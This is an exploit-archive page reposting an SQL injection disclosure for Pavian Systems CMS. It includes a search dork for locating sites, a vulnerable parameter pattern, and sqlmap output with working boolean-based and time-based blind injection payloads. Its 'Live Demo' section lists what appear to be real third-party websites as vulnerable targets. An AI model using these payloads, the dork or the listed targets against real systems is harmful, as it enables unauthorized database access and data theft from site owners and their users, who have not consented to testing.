Home / exploits Pavian Systems CMS SQL injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Pavian Systems CMS SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Pavian Systems CMS SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://paviansystems.com/ # Dork : All Rights Reserved. Design by paviansystems. # Tested on: [ WINDOWS 7] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 05/10/2016 # video Proof : https://youtu.be/1CyISmcwJiU ###################### # [<] DESCRIPTION : ###################### # [+] Pavian Computer Systems is leading web and software development company # [+] that focuses on the areas that are critical to achieving maximum efficiency in IT Environment Utilization # [+] AND an SQL injection has been Detected in Pavian Systems CMS ###################### # [<] Poc : ###################### # [ALL] Parameters Vulnerable To SQLi # http://localhost/allp.php?id=[SQLi] ###################### # [<] SQLmap PoC: ###################### # GET parameter 'product_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N # sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests: # --- # Parameter: product_id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: product_id=38' AND 2172=2172 AND 'vXuF'='vXuF # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: product_id=38' AND SLEEP(5) AND 'nneA'='nneA # --- ###################### # [<] Live Demo : ###################### # http://cit84.com/reflections_detail.php?artid=2 # http://www.growingcrops.in/services.php?id=54 # http://www.vgaexports.com/product_detail.php?product_id=38 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################</BODY></HTML>